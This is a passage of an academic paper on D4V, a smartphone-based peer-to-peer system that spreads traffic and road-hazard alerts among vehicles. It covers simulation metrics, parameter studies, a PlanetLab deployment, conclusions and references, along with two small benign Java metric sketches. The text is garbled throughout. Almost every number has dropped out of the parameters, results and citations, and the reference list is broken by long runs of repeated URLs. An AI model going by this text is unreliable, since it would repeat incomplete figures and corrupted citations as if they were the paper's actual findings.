the second type of packet, the lookup request ( bytes), is used to search for remote peers placed around a specified location. the third packet type is the lookup response ( bytes), which is sent by a dgt peer as a reply to a lookup request, if the peer owns the searched resource or information. finally, the fourth type of packet is related to traffic information ( bytes). all packet types also include a header ( bytes). we set an inter-packet interval of ms for all types of dgt messages; the resulting maximum and minimum rates are, respectively, ≃ kb/s and . kb/s. in a dynamic dgt scenario (the one simulated with deus), packets are not sent periodically: descriptors are sent only after a displacement of ϵ; lookup requests (as well as lookup responses) are sent only when necessary; traffic information messages are sent only when something "interesting" can be communicated to the other peers (for example, a traffic jam or an incident). in order to simulate the presence of non-dgt traffic over lte networks, we also include nv = other ues, transmitting and receiving voip packets (using udp) with a remote host located in the internet. these packets have a byte header and a byte payload, with the inter-packet interval set to ms (the amr . kbps codec is considered).

figure: pdfs of the uplink (a) and downlink (b) delays for dgt packets.

the pdf of the resulting uplink delay, shown in fig. a, can be approximated as a dirac delta function. the pdf of the downlink delay, shown in fig. b, can instead be approximated with a piecewise constant function with three levels. such delay profiles scale from small scenarios to larger ones, as they refer to intra-gb communications only. a dgt message can be propagated across the whole city, from one peer to another, relayed by intermediate peers. each message propagation would be affected only by the data traffic within the gb of the forwarding peer, where the obtained delay profiles apply.

parameters for large-scale analysis
the following set of performance metrics has been considered in the deus-based simulations of the d4v system:
• cp (dimensionless): estimated coverage percentage of d4v messages (trafficinformation and sensordata) at a certain time of the simulation. it is evaluated as the ratio between the number of peers that actually received a specific message and the number of those which should have received it.
• pvtj (dimensionless): average percentage of vehicles (with respect to the total number of vehicles) involved in a traffic jam.
• dfe (dimension: (km)): the distance from event is the average distance from a traffic jam of the interested vehicles which have not received the information about the traffic jam yet. the higher the dfe, the higher the security margin (and related time) to receive the message.
• dr (dimension: (kb/s/peer)): average data rate per peer.
table summarizes the values of the main parameters that affect the performance of the d4v system.

table: parameters affecting the performance of a d4v system.
symbol | description | values
k | number of gbs |
r | thickness of each gb | . km
ϵ | position update threshold | [ . ; ] km
er | event range | [ ; ] km
δ | peer spatial density | [ ; ] veh/km
p | packet loss percentage | [ ; ]
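for clarity, the two least standard metrics can also be expressed in code; the sketch below (hypothetical names and data structures, not the actual analysis tool) computes cp as the ratio of actual to intended recipients and dfe as the mean distance from the event of the interested peers that have not yet received the message.

    import java.util.List;
    import java.util.Set;

    // illustrative computation of the cp and dfe metrics from a simulation snapshot.
    public final class D4VMetrics {
        private D4VMetrics() {}

        // coverage percentage: received / should-have-received, in [0, 100].
        public static double coveragePercentage(Set<String> intendedRecipients,
                                                Set<String> actualRecipients) {
            if (intendedRecipients.isEmpty()) return 100.0;
            long received = actualRecipients.stream()
                                            .filter(intendedRecipients::contains)
                                            .count();
            return 100.0 * received / intendedRecipients.size();
        }

        // distance from event: mean distance (km) of interested peers not yet notified.
        public static double distanceFromEvent(List<GeoPeer> interestedNotNotified, GeoPeer event) {
            if (interestedNotNotified.isEmpty()) return 0.0;
            double sum = 0.0;
            for (GeoPeer p : interestedNotNotified) {
                sum += GeoPeer.distanceKm(p, event);
            }
            return sum / interestedNotNotified.size();
        }
    }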
impact of ϵ
the first step of the simulation-based d4v evaluation aims at analyzing the impact of the value of the threshold ϵ, considering two representative values for the peer spatial density δ (namely, veh/km and veh/km), an event range er equal to km, and a packet loss percentage p = %. as defined in section 'distributed geographic table', ϵ represents the minimum displacement threshold considered by a peer to notify its geographic position update to the peers in its neighborhood. our performance analysis aims at evaluating the effects of the variation of the update frequency on the information dissemination and, consequently, on the system performance.

figure: simulation results for different values of the position update threshold.

in fig. , the impact of ϵ on the considered performance metrics is evaluated. in particular, fig. a, where the cp is investigated, shows that traffic information messages are highly distributed to the active peers in the region of interest. as expected, a higher peer spatial density contributes to increase knowledge sharing, thus increasing the cp. in fig. b, the pvtj is investigated, showing the inherent robustness of d4v. in fact, even in the presence of a reduced update frequency, d4v can properly distribute traffic information, leaving only a small percentage of drivers in traffic jams. we remark that even with lower peer spatial densities (such as δ = peers/km) the performance would not change, provided that ϵ is properly configured (as will be shown in fig. b, discussed below). the effectiveness of the d4v approach is further shown by the dfe results in fig. c. in particular, the dfe remains approximately constant and very close to the dissemination range value of km, confirming that the peers that do not receive a traffic message are those located very far from the traffic event, thus still having a high probability of receiving the alert on time. this analysis suggests that the vehicles stuck in traffic jams are the ones really close to the traffic jam, with not enough time to react and change direction. from the results in fig. d, it can be observed that a finer position update rate (i.e., a lower value of ϵ) and/or a higher peer spatial density increase dr.

impact of event range
in fig. , the same performance metrics of fig. are investigated as functions of er, with ϵ = km and p = %. the results in figs. a and b show clearly that a short er (as small as km) affects the message distribution process, due to a lower margin between the traffic jam and the drivers. in this situation, peers may receive alert messages when they are too close to dangerous situations, thus becoming involved in the queue. in particular, we remark how a lower vehicle density worsens such a phenomenon, due to the smaller number of peers available in the knowledge databases which can redistribute traffic condition event messages. at the same time, it can be observed that there is no significant gap using er values larger than km for both peer density curves. in fig. c, the dfe value for the considered configurations is shown as a function of the range. for comparison, the optimal distance from the event is also shown. the latter coincides with the value of the event range as, ideally, the minimum distance of the peers which did not receive the traffic information message yet is exactly the range of interest.
figure: results for different values of the dissemination range.

the obtained results show that, within a km event range, the dfe remains very close to the optimal bound, while it increasingly separates from it for higher er values. this is quite reasonable, as the area to be covered increases with the square of the event range. hence, drivers who have not yet received the alert for a specific event are in any case sufficiently far from it and will receive the alert with enough time to react. finally, an extended er corresponds to an increased notification area and, consequently, to a larger number of interested drivers that may be contacted. however, as shown in fig. d, this only slightly affects the amount of exchanged messages.

impact of peer spatial density
the third stage of the simulative analysis aims at evaluating the impact, on system performance, of the peer spatial density. in all considered cases, ϵ = km, er = km, and p = %. the scenario is characterized by an initially growing number of active vehicles, followed by a stable phase without new joins or disconnections. the results in fig. a confirm that the proposed solution copes with different peer spatial densities with no performance degradation, keeping the cp significantly high (between % and %) even in the case of very low density ( peers/km), which could be quite critical for vanet-based applications. we recall that, if a mobile peer finds itself in a desert region, it will still be able to fill its external gb with remote peers, by requesting their contacts from the bootstrap node (described in section 'distributed geographic table'), as if it were joining the network again with a new geographic location. such a distributed knowledge provides appropriate support to efficiently disseminate messages about traffic jams or sensed data.

figure: simulation results for different peer densities.

as already observed in section 'impact of event range', the results in fig. c show that an increasing number of active peers maintains the dfe high and close to the dissemination range. this results in an accurate dissemination of traffic information messages that allows drivers to receive alert information on time, still sufficiently far from the dangerous location. in fig. b, the percentages of vehicles blocked in a traffic jam, with and without d4v content dissemination, are directly compared. these results confirm that the d4v approach drastically reduces the number of involved vehicles, which would otherwise grow significantly for increasing density. in fig. d, the average data traffic per peer (dimension: (kb/s/peer)), required to maintain the dgt overlay and disseminate traffic information messages to other active neighbors, is shown as a function of the peer spatial density. since udp is the transport protocol, there are no retransmissions in the presence of lost packets; more details can be found in picone, amoretti & zanichelli ( b).
here, we investigate the average bandwidth (estimated from simulative results, corrected considering the cost of headers) consumed in the best case (when the transmitted message is much longer than the ip header) and in the worst case (when the transmitted message has a size comparable to that of the ip header, e.g., a location update, which contains only a peer descriptor and a location). even if there is an unavoidable growth for increasing peer spatial densities, the amount of data exchanged by each peer remains limited. this behavior is associated with the fact, described in section 'impact of event range', that the d4v system uses an opportunistic content dissemination strategy. in fact, this approach tries to minimize the amount of transmitted packets, by forwarding them only to interested users and trying, at the same time, to reduce the number of duplicated messages. the considered values of peer spatial density are veh/km, veh/km, and veh/km. higher values would be neither realistic nor interesting, as they would mean that all vehicles on the roads run the dgt.

a similar analysis has been carried out by heep et al. ( ), regarding overdrive, the most recent location-aware p2p overlay scheme for smart traffic applications (as anticipated in section 'related work'). their geographic unicast message success rate (gumsr) can be compared to our cp. overdrive is characterized by a gumsr between % and %, with dr > kb/s/peer, while d4v shows a cp > % with dr < kb/s/peer. in overdrive, the bandwidth consumption depends on the flooding rate; in d4v, message dissemination is mostly affected by the peer spatial density (for which gbs could be more or less filled) and by the dissemination range. as shown in section 'impact of event range', even large variations of the latter parameter keep dr significantly below kb/s. moreover, in our analysis, we investigate the dfe of the (100 − cp)% of peers that do not receive the notifications: the higher the dfe, the larger the distance between the event's location and the peers that have not been notified, and hence the higher the security margin. to summarize, in order to have a comprehensive behavior and performance evaluation of location-aware p2p overlay schemes, cp and dfe must be jointly investigated.

robustness
in fig. , the robustness is investigated by analyzing the impact of the packet loss percentage p on cp, pvtj, dfe, and dr. in all cases, ϵ = km and er = km. in the current simulator, there is no recovery procedure to verify whether a transmitted message has been correctly delivered and, if necessary, to retransmit it. this needs to be taken into account to properly interpret the obtained results, in particular for the dissemination of traffic information messages and the global robustness of the dgt approach. in fig. a, the global cp is shown as a function of the packet loss percentage, confirming that peers maintain a detailed knowledge of traffic events (on average more than %) in the first gb. in fig. b, the pvtj appears as a slightly increasing function of p, given that some peers may not receive the alerts on the dangerous event and could be stuck in a queue. the distributed knowledge provided and maintained by the dgt allows to inform a large number of drivers, thus keeping the number of queued vehicles really small. the robustness of d4v is also confirmed by the results in fig. c, showing that the peers that do not receive traffic information messages related to a dangerous event are considerably distant from the event's location. moreover, the dfe is almost independent of p. finally, in fig. d the dr is shown as a function of p. it can be observed that the dr is unavoidably lower than in the other scenarios, due to the lack of a recovery procedure for lost packets.
figure: simulation results for different packet loss percentages.

vehicle speed analysis
finally, considering the behavioral model of a driver in proximity of a road stretch with a bad surface condition, introduced in section 'mobility model', in fig. we show the monitored speed over five virtual tracks with bad surface conditions, for all drivers (including both the informed ones and those not informed). the observed results clearly show that a decreased speed is measured near the critical location (at distance zero), along with an increasing speed while moving away from it. owing to this behavior, it can be concluded that the deployment of d4v would probably reduce the risk of accidents and nuisances, on account of the d4v-based information sharing among drivers, especially those approaching the dangerous event.

figure: average driver speed near road points with bad surface conditions.

experimental evaluation
the extensive simulative analysis of the dgt gave us valuable feedback for the development of a dgt java library and a first prototype of the d4v traffic information system. the dgt library implements the core functionalities, such as neighborhood management and gb maintenance. a d4v application layer uses such features to implement the content dissemination algorithm and the user interface to collect inputs related to a specific traffic event, and to show approaching dangerous situations. the development of the dgt library is based on the open source peer-to-peer middleware called sip2peer (sip2peer), which provides sip-based primitives for the implementation of any peer-to-peer overlay scheme and application.

in order to properly measure the network performance, and to understand whether the results of the simulation analysis are confirmed in a real distributed environment, we deployed d4v nodes on planetlab (https://www.planet-lab.org/), a global research network that supports the development of new network services. planetlab currently consists of about , nodes at sites (the university of parma contributes with nodes). in detail, we deployed d4v peers on different planetlab servers, located in different countries. every s, each node logs all the required information (e.g., geographic location, exchanged kbytes, received and sent messages) to analyze the behavior of the node. at the end of each experiment, a dedicated tool parses all the available log files, to build a time line of the experiment made of steps of s, containing all the required statistics for the performance evaluation. all experiments have been run several times.
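the post-processing step just described (each node logging periodically, a dedicated tool rebuilding a step-by-step timeline) can be sketched as follows; the field names and log structure are assumptions for illustration only and do not reflect the actual analysis tool.

    import java.util.Map;
    import java.util.TreeMap;

    // illustrative aggregation of per-node log records into fixed-size time-line steps.
    public class ExperimentTimeline {
        // one log record emitted periodically by a d4v node. hypothetical fields.
        public static class LogRecord {
            public final long timestampSeconds;
            public final double exchangedKBytes;
            public LogRecord(long timestampSeconds, double exchangedKBytes) {
                this.timestampSeconds = timestampSeconds;
                this.exchangedKBytes = exchangedKBytes;
            }
        }

        // sums exchanged traffic per time-line step of stepSeconds.
        public static Map<Long, Double> trafficPerStep(Iterable<LogRecord> records, long stepSeconds) {
            Map<Long, Double> perStep = new TreeMap<>();
            for (LogRecord r : records) {
                long step = r.timestampSeconds / stepSeconds;  // index of the time-line step
                perStep.merge(step, r.exchangedKBytes, Double::sum);
            }
            return perStep;
        }
    }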
fig. a illustrates the coverage percentage. the generation of traffic messages starts s after the activation of a dedicated d4v event-generator node, in order to give the peers sufficient time to build the dgt overlay. the results show that the average value of cp is very high (close to %) and, in particular, very near the average value of our simulations (≃ %). the cp curve shows that when new messages are generated, the coverage percentage goes slightly down, but after one or two time line steps ( / s) it recovers to a high coverage percentage, thus confirming that the dissemination process and the neighborhood knowledge allow messages to be distributed efficiently. fig. b shows the dfe of the planetlab deployment, considering a km interest range for disseminated messages. the graph confirms that the vehicles that did not receive a message are, on average, significantly far from the dangerous event and, with high probability, have a sufficient margin to receive the message before approaching the potentially dangerous location, by changing their direction to reach their destination using a different route, or just by adapting their vehicle speed (for example, in proximity of a portion of damaged road surface).

figure: planetlab experimental results: (a) coverage percentage; (b) distance from event (dfe).

conclusions
in this paper, we have introduced d4v, a scalable system for the opportunistic dissemination of information gathered through commercial smartphones, from vehicle sensors and driver inputs. d4v relies on the potential of dgt, a p2p overlay network which unifies the concepts of geographical and virtual neighborhoods. two key results have been presented. the first one is the derivation of an analytical framework to characterize the discovery procedure of the dgt proactive neighbor localization protocol. the outcome, namely the average number of newly discovered nodes at each step, can provide useful guidelines for the design of a dgt-based application, to determine how to appropriately set the main system parameters in order to guarantee a desired missing node percentage. the second result is the design of an effective and efficient opportunistic dissemination strategy which relies on the dgt to distribute vehicular information and sensed data to interested drivers. simulation results show that the proposed d4v system guarantees a high vehicular notification coverage over a wide range of system parameter values, whilst generating limited control data traffic and coping reasonably well with significant packet losses. hence, we are confident that d4v could be effectively used on the road to reduce the number of drivers involved in traffic jams, as well as to disseminate alert messages about potentially dangerous road stretches, thus allowing drivers to reduce risks and nuisances along their paths. further work will investigate the optimization of opportunistic message dissemination with minimum d4v message traffic load (e.g., by estimating vehicle trajectories).
moreover, we will investigate a global communication model which takes into account both user mobility and available wireless network (wi-fi and cellular) coverage: this will likely improve the flexibility, accuracy, and reliability of d4v.

additional information and declarations

funding
the work of gianluigi ferrari was partially supported under the one-year project "cross-network effective traffic alerts dissemination" (x-netad, eureka label e! , – ), sponsored by the ministry of foreign affairs (italy) and the israeli industry center for r&d (israel) under the "israel-italy joint innovation program for industrial, scientific and technological cooperation in r&d". the work of marco picone is supported by guglielmo srl, reggio emilia, italy. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
ministry of foreign affairs.
the israeli industry center for r&d (israel).
guglielmo srl, reggio emilia, italy.

competing interests
the authors declare there are no competing interests.

author contributions
• marco picone conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, and performed the computation work.
• michele amoretti conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, and performed the computation work.
• gianluigi ferrari and francesco zanichelli conceived and designed the experiments and reviewed drafts of the paper.

data availability
the following information was supplied regarding the deposition of related data: https://github.com/dsg-unipr/deus/.

references
aberer k, alima lo, ghodsi a, girdzijauskas s, haridi s, hauswirth m. . the essence of p2p: a reference architecture for overlay networks. in: ieee int.'l conference on peer-to-peer computing (p2p). konstanz, germany.
amoretti m. . a survey of peer-to-peer overlay schemes: effectiveness, efficiency and security. recent patents on computer science ( ): – doi . / .
amoretti m, agosti m, zanichelli f. . deus: a discrete event universal simulator. in: icst/acm int.'l conference on simulation tools and techniques (simutools). roma, italy.
amoretti m, picone m, zanichelli f, ferrari g. . simulating mobile and distributed systems with deus and ns-3. in: international conference on high performance computing and simulation. helsinki, finland.
bronsted j, kristensen lm. . specification and performance evaluation of two zone dissemination protocols for vehicular ad-hoc networks. in: annual simulation symposium. huntsville, alabama, usa.
buchanan m. . nexus: small worlds and the groundbreaking theory of networks. new york: w. w. norton & company.
burke j, estrin d, hansen m, parker a, ramanathan n, reddy s, srivastava mb. . participatory sensing. in: wsw. boulder, colorado, usa.
caliskan m, graupner d, mauve m. . decentralized discovery of free parking places. in: int.'l workshop on vehicular ad hoc networks. los angeles, california, usa.
cox c. . an introduction to lte: lte, lte-advanced, sae and 4g mobile communications. hoboken: wiley.
dietzel s, petit j, kargl f, scheuermann b. . in-network aggregation for vehicular ad hoc networks. ieee communications surveys & tutorials ( ): – doi . /comst. . .
distributed system group. d4v videos. available at http://dsg.ce.unipr.it/d4v.
du l, dao h. . information dissemination delay in vehicle-to-vehicle communication networks in a traffic stream. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . .
emule project. homepage. available at http://www.emule-project.net.
fewell mp. . area of common overlap of three circles. tech. report of the department of defence, australian government.
fiore m, harri j, filali f, bonnet f. . vehicular mobility simulation with vanetmobisim. simulation ( ): – doi . / .
fujiki t, kirimura m, umedu t, higashino t. . efficient acquisition of local traffic information using inter-vehicle communication with queries. in: int.'l ieee conference on intelligent transportation systems (itsc). seattle, washington, usa.
gerla m, kleinrock l. . vehicular networks and the future of the mobile internet. computer networks ( ): – doi . /j.comnet. . . .
granovetter m. . the strength of weak ties. american journal of sociology ( ): – doi . / .
hadaller d, keshav s, brecht t, agarwal s. . vehicular opportunistic communication under the microscope. in: int.'l conference on mobile systems, applications and services (mobisys). san juan, puerto rico.
han m, moon s, lee y, jang k, lee d. . evaluation of voip quality over wibro. in: passive and active measurement conference (pam). cleveland, ohio, usa.
harri j, filali f, bonnet c. . a framework for mobility models generation and its application to inter-vehicular networks. in: ieee int.'l workshop on mobility management and wireless access. cologne, germany.
hartenstein h, laberteaux k. . vanet vehicular applications and inter-networking technologies. hoboken: wiley.
http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dsg.ce.unipr.it/d v http://dx.doi.org/ . /tits. . http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://www.emule-project.net http://dx.doi.org/ . / http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. heep b, florian m, volz j, baumgart i. . overdrive: an overlay-based geocast service for smart traffic applications. in: th annual conference on wireless on-demand network systems and services (wons). banff, alberta, canada. hull b, bychkovsky v, zhang y, chen k, goraczko m, miu a, shih e, balakrishnan h, madden s. . cartel: a distributed mobile sensor computing system. in: th acm conference on embedded networked sensor systems (sensys). boulder, colorado, usa. jedrzej r, scheuermann b, koegel m, mauve m. . peertis: a peer-to-peer traffic information system. in: int.’l conference on mobile computing and networking. beijing, china. jiang d, taliwal v, meier a, holfelder w, herrtwich r. . design of . ghz dsrc-based vehicular safety communication. ieee wireless communications ( ): – doi . /wc-m. . . krauss s, wagner p, gawron c. . metastable states in a microscopic model of traffic flow. physical review e : – doi . /physreve. . . lee u, gerla m. . a survey of urban vehicular sensing platforms. computer networks ( ): – doi . /j.comnet. . . . lee u, magistretti e, zhou b, gerla m, bellavista p, corradi a. . mobeyes: smart mobs for urban monitoring with vehicular sensor networks. ieee wireless communications ( ): – doi . /wc-m. . . leontiadis i, mascolo c. . opportunistic spatio-temporal dissemination system for vehicular networks. in: int.’l conference on mobile systems, applications and services (mobisys). san juan, puerto rico. longley pa, goodchild mf, maguire dj, rhind dw. . geographic information systems and science. hoboken: wiley. lte-epc network simulator (lena). release m . available at http://mailman.isi.edu/pipermail/ ns-developers/ -january/ .html. mahmoud a, olariu s. . zipper: a zero-infrastructure peer-to-peer system for vanet. in: int.’l workshop on modeling analysis and simulation of wireless and mobile systems (mswim). chania, crete island, greece. 
maymounkov p, mazieres d. . kademlia: a peer-to-peer information system based on the xor metric. in: st international workshop on peer-to-peer systems. meneguette ri, maia g, madeira erm, loureiro aaf. . autonomic data dissemination in highway vehicular ad hoc networks with diverse traffic conditions. in: ieee symposium on computers and communication (iscc). madeira, portugal. mohan p, padmanabhan v, ramjee r. . nericell: rich monitoring of road and traffic conditions using mobile smartphones. in: th acm conference on embedded networked sensor systems (sensys). raleigh, north carolina, usa. mun m, reddy s, shilton k, yau n, boda p, burke j, estrin d, hansen m, howard e, west r. . peir, the personal environmental impact report, as a platform for participatory sensing systems research. in: int.’l conference on mobile systems, applications and services (mobisys). krakow, poland. ns- development team. ns- official homepage. available at http://www.nsnam.org. papoulis a. . probability, random variables, and stochastic processes. milano: mcgraw hill. picone m, amoretti m, zanichelli f. a. proactive neighbor localization based on distributed geographic table. international journal of pervasive computing and communications ( ): – doi . / . picone m, amoretti m, zanichelli f. b. evaluating the robustness of the dgt approach picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /wc-m. . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . /wc-m. . http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html 
http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. for smartphone-based vehicular networks. in: ieee workshop on user mobility and vehicular networks. bonn, germany. qureshi a, carlisle j, guttag j. . tavarua: video streaming with wwan striping. in: acm multimedia. acm. rybicki j, scheuermann b, kiess w, lochert c, fallahi p, mauve m. . challenge: peers on wheels—a road to new traffic information systems. in: th annual acm int.l conference on mobile computing and networking (mobicom). new york, new york, usa. santa j, moragon a, gomez-skarmeta af. . 
experimental evaluation of a novel vehicular communication paradigm based on cellular networks. in: ieee intelligent vehicles symposium. eindhoven, netherlands. seskar i, marie s, holtzman j, wasserman j. . rate of location area updates in cellular systems. in: ieee vehicular technology conference (vtc ’ ). denver, colorado, usa. shinkawa t, terauchi t, kitani t, shibata n, yasumoto k, ito m, higashino t. . a technique for information sharing using inter-vehicle communication with message ferrying. in: ieee int.’l conference on mobile data management (mdm ’ ). nara, japan. sip peer. . sip peer. available at http://code.google.com/p/sip peer. stojmenovic i. . simulations in wireless sensor and ad hoc networks: matching and advancing models, metrics, and solutions. ieee communications magazine ( ): – doi . /mcom. . . sun microsystems, inc. . jxta technology: creating connected communities. in: white paper. santa clara: sun microsystems. tonguz o, wisitpongphan n, bai f, mudalige p, sadekar v. . broadcasting in vanet. in: workshop on vehicular ad hoc networks (move’ ). montreal, canada. trieber m, hennecke a, helbing d. . congested traffic states in empirical observations and microscopic simulations. physical review e ( ): – doi . /physreve. . . vakulenko a. circles intersection library for matlab. available at http://www.mathworks.com/ matlabcentral/fileexchange/ . wegener a, hellbruck h, fischer s, schmidt c, fekete s. . autocast: an adaptive data dissemination protocol fro traffic information systems. in: th ieee vehicular technology conference (vtc ’ ). dublin, ireland. wi-fi alliance. . wi-fi direct standard. available at http://www.wi-fi.org/wi-fi direct.php. xiang q, chen x, kong l, rao l, liu x. . data preference matters: a new perspective of safety data dissemination in vehicular ad hoc networks. in: ieee infocom. ieee. xu h, barth m. . an adaptive dissemination mechanism form inter-vehicle communication-based decentralized traffic information system. in: th int’l ieee conference on intelligent transportation systems (itcs ’ ). toronto, canada. yan t, zhang w, wang g. . dove: data dissemination to a desired number of receivers in vanet. ieee transactions on vehicular technology ( ): – doi . /tvt. . . zhao j, cao g. . vadd: vehicle-assisted data delivery in vehicular ad hoc networks. ieee transaction on vehicular technology ( ): – doi . /tvt. . . zhou b, xu k, gerla m. . group and swarm mobility models for ad hoc network scenarios using virtual tracks. in: ieee military communications conference (milcom). monterey, california, usa. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /physreve. . http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ 